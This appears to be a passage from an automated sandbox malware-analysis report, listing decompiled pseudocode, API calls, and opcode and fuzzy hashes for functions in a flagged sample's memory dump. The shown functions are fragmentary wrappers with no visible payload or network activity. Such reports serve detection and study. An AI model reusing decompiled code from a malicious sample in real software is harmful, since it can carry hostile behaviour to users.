                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: User
                                                            • String ID:
                                                            • API String ID: 765557111-0
                                                            • Opcode ID: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                                            • Instruction ID: 51bb3e4d3c65d1b68e811fd300e6297570c351fdba75a3772b9df24f0de606b7
                                                            • Opcode Fuzzy Hash: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                                            • Instruction Fuzzy Hash: DAE0C27768030467FB30A1A99C46FB6364E5B84B00F048475F90CE63C2D4E8E8C00019
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E9A3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 207 41e9a3-41e9d7 call 41f193 LookupPrivilegeValueW
                                                            C-Code - Quality: 100%
                                                            			E0041E9A3(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F193( *((intOrPtr*)(_a4 + 0x3b0)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x3b0)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                            0x0041e9bd
                                                            0x0041e9d3
                                                            0x0041e9d7

                                                            APIs
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEE5,0040FEE5,?,00000000,?,?), ref: 0041E9D3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LookupPrivilegeValue
                                                            • String ID:
                                                            • API String ID: 3899507212-0
                                                            • Opcode ID: 82c5a5ab97d4eb4480414d61d3416bef4d430d63bd1f97b56dd2d6bdd6b819e2
                                                            • Instruction ID: 478dd373caa91782934bf72652368151c9cc639b58a8f90b17d0897d397b7721
                                                            • Opcode Fuzzy Hash: 82c5a5ab97d4eb4480414d61d3416bef4d430d63bd1f97b56dd2d6bdd6b819e2
                                                            • Instruction Fuzzy Hash: 38E01AB1600304ABC714DF49CC45FE737ADAF88654F014469BA0857242C634E9148AF5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E845 Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 79%
                                                            			E0041E845() {
				char _t10;
				void* _t18;

				asm("in al, dx");
				_t7 =  *((intOrPtr*)(_t18 + 8));
				_t3 = _t7 + 0xaa0; // 0xaa0
				E0041F193( *((intOrPtr*)( *((intOrPtr*)(_t18 + 8)) + 0x14)), _t7, _t3,  *((intOrPtr*)( *((intOrPtr*)(_t18 + 8)) + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap( *(_t18 + 0xc),  *(_t18 + 0x10),  *(_t18 + 0x14)); // executed
				return _t10;
			}





                                                            0x0041e845
                                                            0x0041e846
                                                            0x0041e852
                                                            0x0041e85a
                                                            0x0041e870
                                                            0x0041e874

                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,67F1BF61,00000000,?), ref: 0041E870
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 16488a0969da05b2cb0e09bf84498e270ecd2a7857b61221015f7094cc6fefb7
                                                            • Instruction ID: 90b2fd086dbed490b836dcd73ca76eaa7bb3befc7414c65856cc485b600f3304
                                                            • Opcode Fuzzy Hash: 16488a0969da05b2cb0e09bf84498e270ecd2a7857b61221015f7094cc6fefb7
                                                            • Instruction Fuzzy Hash: B8E046B1200204BFCB14DF59DC48FE73B6DEF88354F018569F9099B281C230E915CAB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E876 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 28%
                                                            			E0041E876(intOrPtr _a4, void* _a8) {
				void* _t19;

				asm("xlatb");
				asm("in al, 0x1b");
				if(_t19 <= 0) {
					_t6 = _a4;
					E0041F193( *((intOrPtr*)(_a4 + 0x4cc)), _a4, _t6 + 0xaa8,  *((intOrPtr*)(_a4 + 0x4cc)), 0, 0x36);
				}
				asm("adc al, 0x52"); // executed
				ExitProcess(??);
			}




                                                            0x0041e87b
                                                            0x0041e87c
                                                            0x0041e881
                                                            0x0041e886
                                                            0x0041e89d
                                                            0x0041e8a7
                                                            0x0041e8a9
                                                            0x0041e8ab

                                                            APIs
                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E8AB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: 299ce261b31517164f817ecf6578126c28507b9422eeec8d687af3fec42889a5
                                                            • Instruction ID: 96147be26e6388fcd3053bb24dc27cc49bce8baa340c1af9fc20bede1d2fb69c
                                                            • Opcode Fuzzy Hash: 299ce261b31517164f817ecf6578126c28507b9422eeec8d687af3fec42889a5
                                                            • Instruction Fuzzy Hash: B2E0DF346013047BC6209B45CCC1FC7B7A8AF08B90F458464BA081B242C230FA10C7D4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E883 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 50%
                                                            			E0041E883(intOrPtr _a4, void* _a8) {

				_t5 = _a4;
				E0041F193( *((intOrPtr*)(_a4 + 0x4cc)), _a4, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x4cc)), 0, 0x36);
				asm("adc al, 0x52"); // executed
				ExitProcess(??);
			}



                                                            0x0041e886
                                                            0x0041e89d
                                                            0x0041e8a9
                                                            0x0041e8ab

                                                            APIs
                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E8AB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: 793c90c4681a4b6202f5ac56fbb43b9a7e517e4410fe7f89bfe45fb9aa8a43ba
                                                            • Instruction ID: 50992a3d472a59096940bbb5054f34203a4f71d2cf9700162529e2e9092c3957
                                                            • Opcode Fuzzy Hash: 793c90c4681a4b6202f5ac56fbb43b9a7e517e4410fe7f89bfe45fb9aa8a43ba
                                                            • Instruction Fuzzy Hash: 36D0C772600204BBCA20EB88CC85FD337ACEF446A0F0080A5BA0C5B282C630FA00C7E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A3967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 7b4d59301c6ac7c6f914524daee675cbd60f169d370a4182ac9f496176946508
                                                            • Instruction ID: ebb6eae82783042fdfa7b67d75d166a2d69caf98c6c08761ff6f1cae3a7c831a
                                                            • Opcode Fuzzy Hash: 7b4d59301c6ac7c6f914524daee675cbd60f169d370a4182ac9f496176946508
                                                            • Instruction Fuzzy Hash: BCB092B2A064C5CAEB51E7B04A08B2B7A04BBE0741F26C062E2020681A47B8C491F6B6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 00A26A60 Relevance: .2, Instructions: 227COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 66%
                                                            			E00A26A60(intOrPtr* _a4) {
				signed int _v8;
				char _v24;
				signed char _v25;
				intOrPtr* _v32;
				signed char _v36;
				signed int _v40;
				intOrPtr* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				signed char _v72;
				signed char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed char _v88;
				signed int _v92;
				signed char _v96;
				char _v100;
				signed int _v104;
				void* _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t101;
				void* _t105;
				signed int _t112;
				signed int* _t113;
				signed int* _t114;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t122;
				signed int _t127;
				intOrPtr* _t128;
				signed int _t131;
				signed char _t134;
				signed int _t136;
				intOrPtr* _t138;
				intOrPtr* _t139;
				intOrPtr _t143;
				signed char _t144;
				signed short _t145;
				signed char _t146;
				intOrPtr* _t147;
				intOrPtr _t148;
				void* _t150;
				char _t152;
				signed int _t153;
				signed char _t154;

				_v8 =  *0xaed360 ^ _t153;
				_t144 =  *0x7ffe03c6;
				_v25 = _t144;
				_t128 = _a4;
				_v44 = _t128;
				if((_t144 & 0x00000001) == 0) {
					L54:
					_push(0);
					_push( &_v100);
					E00A39810();
					 *_t128 = _v100;
					 *(_t128 + 4) = _v96;
					goto L20;
				} else {
					do {
						_t148 =  *0x7ffe03b8;
						_t134 =  *0x7FFE03BC;
						_t146 =  *0x7FFE03BC;
						_v60 = _t148;
						_v76 = _t134;
					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
					_t128 = _v44;
					if((_t144 & 0x00000002) != 0) {
						_t147 =  *0xae6908; // 0x0
						_v68 = _t147;
						if(_t147 == 0) {
							goto L54;
						} else {
							goto L22;
						}
						while(1) {
							L22:
							_t101 =  *_t147;
							_v32 = _t101;
							if(_t101 == 0) {
								break;
							}
							if(_t144 >= 0) {
								if((_t144 & 0x00000020) == 0) {
									if((_t144 & 0x00000010) != 0) {
										asm("mfence");
									}
								} else {
									asm("lfence");
								}
								asm("rdtsc");
							} else {
								asm("rdtscp");
								_v72 = _t134;
							}
							_v52 = _t101;
							_v84 =  *((intOrPtr*)(_t147 + 8));
							_v64 =  *((intOrPtr*)(_t147 + 0x10));
							_v80 =  *((intOrPtr*)(_t147 + 0x14));
							_t105 = E00A3CF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t146 = _t144;
							E00A3CF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t150 = _t105 + _t144;
							_t144 = _v25;
							asm("adc edi, 0x0");
							_v40 = _t150 + _v64;
							_t147 = _v68;
							asm("adc edi, [ebp-0x4c]");
							_v36 = _t146;
							if( *_t147 != _v32) {
								continue;
							} else {
								_t128 = _v44;
								_t147 = _v60;
								L19:
								_t144 = _v36;
								asm("adc edx, [ebp-0x48]");
								 *_t128 = E00A3D340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
								 *(_t128 + 4) = _t144;
								L20:
								return E00A3B640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
							}
						}
						_t128 = _v44;
						goto L54;
					}
					_v56 = 0xffffffff;
					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
						_t136 = 0x14c;
						L14:
						_t112 = _t136 & 0x0000ffff;
						L15:
						if(_t112 == 0xaa64) {
							_t113 =  &_v40;
							_v32 = _t113;
							_t138 = _v32;
							asm("int 0x81");
							 *_t138 = _t113;
							 *(_t138 + 4) = _t144;
							if((_t144 & 0x00000040) == 0) {
								goto L19;
							}
							_t114 =  &_v92;
							_v32 = _t114;
							_t139 = _v32;
							asm("int 0x81");
							 *_t139 = _t114;
							 *(_t139 + 4) = _t144;
							_t144 = _v88;
							if(((_t144 ^ _v36) & 0x00000001) != 0) {
								goto L19;
							}
							_t112 = _v92;
							L18:
							_v40 = _t112;
							_v36 = _t144;
							goto L19;
						}
						if(_t144 >= 0) {
							if((_t144 & 0x00000020) == 0) {
								if((_t144 & 0x00000010) != 0) {
									asm("mfence");
								}
							} else {
								asm("lfence");
							}
							asm("rdtsc");
						} else {
							asm("rdtscp");
						}
						goto L18;
					}
					_t117 =  *[fs:0x18];
					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
					if(_t143 < 0) {
						_t117 = _t117 + _t143;
					}
					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
					} else {
						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
					}
					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
						L34:
						_v48 = 0x10;
						_push( &_v48);
						_push(0x10);
						_t146 =  &_v24;
						_push(_t146);
						_push(4);
						_push( &_v56);
						_push(0xb5);
						_t122 = E00A3AA90();
						if(_t122 == 0xc0000023) {
							_t152 = _v48;
							E00A3D000(_t152);
							_t146 = _t154;
							_push( &_v48);
							_push(_t152);
							_push(_t146);
							_push(4);
							_push( &_v56);
							_push(0xb5);
							_t122 = E00A3AA90();
							_t147 = _v60;
						}
						if(_t122 < 0) {
							_t112 = _v104;
							_t144 = _v25;
							goto L15;
						} else {
							_t145 =  *_t146;
							_t136 = 0;
							if(_t145 == 0) {
								L43:
								_t144 = _v25;
								goto L14;
							}
							_t131 = 0;
							do {
								if((_t145 & 0x00040000) != 0) {
									_t136 = _t145 & 0x0000ffff;
								}
								_t145 =  *(_t146 + 4 + _t131 * 4);
								_t131 = _t131 + 1;
							} while (_t145 != 0);
							_t128 = _v44;
							goto L43;
						}
					} else {
						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
						if(_t127 == 0) {
							goto L34;
						}
						_t136 = _t127;
						goto L14;
					}
				}
			}






















































                                                            0x00a26a6f
                                                            0x00a26a72
                                                            0x00a26a78
                                                            0x00a26a7c
                                                            0x00a26a7f
                                                            0x00a26a87
                                                            0x00a68049
                                                            0x00a68049
                                                            0x00a6804e
                                                            0x00a6804f
                                                            0x00a68057
                                                            0x00a6805c
                                                            0x00000000
                                                            0x00a26a8d
                                                            0x00a26a92
                                                            0x00a26a92
                                                            0x00a26a94
                                                            0x00a26a99
                                                            0x00a26a9c
                                                            0x00a26a9f
                                                            0x00a26aa2
                                                            0x00a26aaa
                                                            0x00a26ab0
                                                            0x00a67eae
                                                            0x00a67eb4
                                                            0x00a67eb9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00a67ebf
                                                            0x00a67ebf
                                                            0x00a67ebf
                                                            0x00a67ec1
                                                            0x00a67ec6
                                                            0x00000000
                                                            0x00000000
                                                            0x00a67ece
                                                            0x00a67edb
                                                            0x00a67ee5
                                                            0x00a67ee7
                                                            0x00a67ee7
                                                            0x00a67edd
                                                            0x00a67edd
                                                            0x00a67edd
                                                            0x00a67eea
                                                            0x00a67ed0
                                                            0x00a67ed0
                                                            0x00a67ed3
                                                            0x00a67ed3
                                                            0x00a67eec
                                                            0x00a67ef8
                                                            0x00a67f00
                                                            0x00a67f07
                                                            0x00a67f0a
                                                            0x00a67f19
                                                            0x00a67f1b
                                                            0x00a67f23
                                                            0x00a67f25
                                                            0x00a67f28
                                                            0x00a67f2e
                                                            0x00a67f31
                                                            0x00a67f34
                                                            0x00a67f37
                                                            0x00a67f3c
                                                            0x00000000
                                                            0x00a67f3e
                                                            0x00a67f3e
                                                            0x00a67f41
                                                            0x00a26b35
                                                            0x00a26b38
                                                            0x00a26b44
                                                            0x00a26b4c
                                                            0x00a26b4e
                                                            0x00a26b51
                                                            0x00a26b69
                                                            0x00a26b69
                                                            0x00a67f3c
                                                            0x00a68046
                                                            0x00000000
                                                            0x00a68046
                                                            0x00a26abc
                                                            0x00a26aca
                                                            0x00a67f49
                                                            0x00a26b13
                                                            0x00a26b13
                                                            0x00a26b16
                                                            0x00a26b1e
                                                            0x00a67fe7
                                                            0x00a67fea
                                                            0x00a67fed
                                                            0x00a67ff0
                                                            0x00a67ff2
                                                            0x00a67ff4
                                                            0x00a67ffa
                                                            0x00000000
                                                            0x00000000
                                                            0x00a68000
                                                            0x00a68003
                                                            0x00a68006
                                                            0x00a68009
                                                            0x00a6800b
                                                            0x00a6800d
                                                            0x00a68010
                                                            0x00a6801f
                                                            0x00000000
                                                            0x00000000
                                                            0x00a68025
                                                            0x00a26b2f
                                                            0x00a26b2f
                                                            0x00a26b32
                                                            0x00000000
                                                            0x00a26b32
                                                            0x00a26b26
                                                            0x00a68030
                                                            0x00a6803a
                                                            0x00a6803c
                                                            0x00a6803c
                                                            0x00a68032
                                                            0x00a68032
                                                            0x00a68032
                                                            0x00a6803f
                                                            0x00a26b2c
                                                            0x00a26b2c
                                                            0x00a26b2c
                                                            0x00000000
                                                            0x00a26b26
                                                            0x00a26ad0
                                                            0x00a26ad6
                                                            0x00a26ade
                                                            0x00a26ae0
                                                            0x00a26ae0
                                                            0x00a26ae5
                                                            0x00a67f53
                                                            0x00a26aeb
                                                            0x00a26aeb
                                                            0x00a26aeb
                                                            0x00a26af3
                                                            0x00a67f5e
                                                            0x00a67f61
                                                            0x00a67f68
                                                            0x00a67f69
                                                            0x00a67f6b
                                                            0x00a67f70
                                                            0x00a67f71
                                                            0x00a67f76
                                                            0x00a67f77
                                                            0x00a67f7c
                                                            0x00a67f86
                                                            0x00a67f88
                                                            0x00a67f8d
                                                            0x00a67f92
                                                            0x00a67f97
                                                            0x00a67f98
                                                            0x00a67f99
                                                            0x00a67f9a
                                                            0x00a67f9f
                                                            0x00a67fa0
                                                            0x00a67fa5
                                                            0x00a67faa
                                                            0x00a67faa
                                                            0x00a67faf
                                                            0x00a67fdc
                                                            0x00a67fdf
                                                            0x00000000
                                                            0x00a67fb1
                                                            0x00a67fb1
                                                            0x00a67fb3
                                                            0x00a67fb8
                                                            0x00a67fd4
                                                            0x00a67fd4
                                                            0x00000000
                                                            0x00a67fd4
                                                            0x00a67fba
                                                            0x00a67fbc
                                                            0x00a67fc2
                                                            0x00a67fc4
                                                            0x00a67fc4
                                                            0x00a67fc7
                                                            0x00a67fcb
                                                            0x00a67fcc
                                                            0x00a67fd1
                                                            0x00000000
                                                            0x00a67fd1
                                                            0x00a26b04
                                                            0x00a26b04
                                                            0x00a26b0b
                                                            0x00000000
                                                            0x00000000
                                                            0x00a26b11
                                                            0x00000000
                                                            0x00a26b11
                                                            0x00a26af3

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77c0ddbc9d4f2a3d2a4524eb17455db149e1379c6b634ee0366abcb911787d10
                                                            • Instruction ID: 5df363bfa2e72a39f0171e92060cf6b7cf1572b16d2dc38da16dcfbb512693f7
                                                            • Opcode Fuzzy Hash: 77c0ddbc9d4f2a3d2a4524eb17455db149e1379c6b634ee0366abcb911787d10
                                                            • Instruction Fuzzy Hash: D2815A71E01229DFDB24CF98C981BEEBBB5EF08354F148069E945EB281D735AD05CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A398A0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16e8a920fad6b5eda3d2f88ad2d32bf4cfbaa4bf923c0e66a1e6fd14d6e47b4c
                                                            • Instruction ID: 0b13b395201cdf5bd91d2a05f22798cdf27c0851ca0406f5953b342991ef05ac
                                                            • Opcode Fuzzy Hash: 16e8a920fad6b5eda3d2f88ad2d32bf4cfbaa4bf923c0e66a1e6fd14d6e47b4c
                                                            • Instruction Fuzzy Hash: 5590026530100402D242616944546060009D7D1385F91C022E1414595D86658953F172
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39820 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 58a8ecfc0cd46d3db0127fcbbce840d90b2be95e3db71c919eaef885d81f4c12
                                                            • Instruction ID: 62e92110489a14913f2351391e12109e8fc55dec0e3208a079e99935e2d925a1
                                                            • Opcode Fuzzy Hash: 58a8ecfc0cd46d3db0127fcbbce840d90b2be95e3db71c919eaef885d81f4c12
                                                            • Instruction Fuzzy Hash: 6390027534100402D281716944446060009A7D0381F91C022A0414594E86958A56FAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A3B040 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4cbd9622c2b5d52c22aafb257b172b6f11610efc462580472ad67dbeccb18858
                                                            • Instruction ID: 496b9890b1531fdcc842476d2593b25ce7ac08528d0f0ddf09689988ccfe635f
                                                            • Opcode Fuzzy Hash: 4cbd9622c2b5d52c22aafb257b172b6f11610efc462580472ad67dbeccb18858
                                                            • Instruction Fuzzy Hash: 8D9002A5701140434680B16948444065015A7E1341391C131A04445A0C86A88855E2A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A399D0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 107a5b1d3511c0a82f196021f444a1354c05cbaca30510f2ebd8f0843c6d17fb
                                                            • Instruction ID: adbf2bef3e4705d69d95c54574bdef2552c8662c3597c14e498482c554cfeaf9
                                                            • Opcode Fuzzy Hash: 107a5b1d3511c0a82f196021f444a1354c05cbaca30510f2ebd8f0843c6d17fb
                                                            • Instruction Fuzzy Hash: 349002A531100042D24461694444706004597E1341F51C022A2144594CC5698C61A165
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39950 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 039c539fd119558a76ebd7506ad3990fe2eae0f293faee4187cb0caaced24b57
                                                            • Instruction ID: a2b104b94d9160774cf3132984c2b982a9310a160bd42aa155c31c3af8f33c2a
                                                            • Opcode Fuzzy Hash: 039c539fd119558a76ebd7506ad3990fe2eae0f293faee4187cb0caaced24b57
                                                            • Instruction Fuzzy Hash: EA9002A530140403D28065694844607000597D0342F51C021A2054595E8A698C51B175
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39A80 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e0f33373cca3e0cdc8fb9098bc33cd5513dba18b68b99e2a1c01c1f676f854b3
                                                            • Instruction ID: f2fd822791b6a01ae21b6ab442b06185d810bf162d4e56d9469bb2d0192dad71
                                                            • Opcode Fuzzy Hash: e0f33373cca3e0cdc8fb9098bc33cd5513dba18b68b99e2a1c01c1f676f854b3
                                                            • Instruction Fuzzy Hash: 1C90026530144442D28062694844B0F410597E1342F91C029A4146594CC9558855A761
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39A10 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 99aecfa6c5031749b943f0518642f659bde2d6b50977f3aab02d58d34f1fd479
                                                            • Instruction ID: 25159b2f1e3f93a711d37580008ae5727f58341129f5fff04a2ddd65b72ccfcf
                                                            • Opcode Fuzzy Hash: 99aecfa6c5031749b943f0518642f659bde2d6b50977f3aab02d58d34f1fd479
                                                            • Instruction Fuzzy Hash: BC90027530140402D24061694848747000597D0342F51C021A5154595E86A5C891B571
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A3A3B0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac5749bab94b8e8dc3efd648bce76a87a3196a041d9fd1d2f28ca8f9f7c407e4
                                                            • Instruction ID: 306fdddda10b7708a754be9709a80c5b1f5fdd6195a96ef02a1ff9a34215d0fa
                                                            • Opcode Fuzzy Hash: ac5749bab94b8e8dc3efd648bce76a87a3196a041d9fd1d2f28ca8f9f7c407e4
                                                            • Instruction Fuzzy Hash: 1C90027530144002D2807169848460B5005A7E0341F51C421E0415594C86558856E261
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A39B00 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 85c59540935ae9d81cf45e5a5af5e96553f7b2443d76db0f55b00f16d769e7c0
                                                            • Instruction ID: d03eaf5341150d8741fa6097fe9defc73e5e10fbd0e7fac6561da8ac93da2caa
                                                            • Opcode Fuzzy Hash: 85c59540935ae9d81cf45e5a5af5e96553f7b2443d76db0f55b00f16d769e7c0
                                                            • Instruction Fuzzy Hash: 1990026534100802D280716984547070006D7D0741F51C021A0014594D86568965B6F1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A395F0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
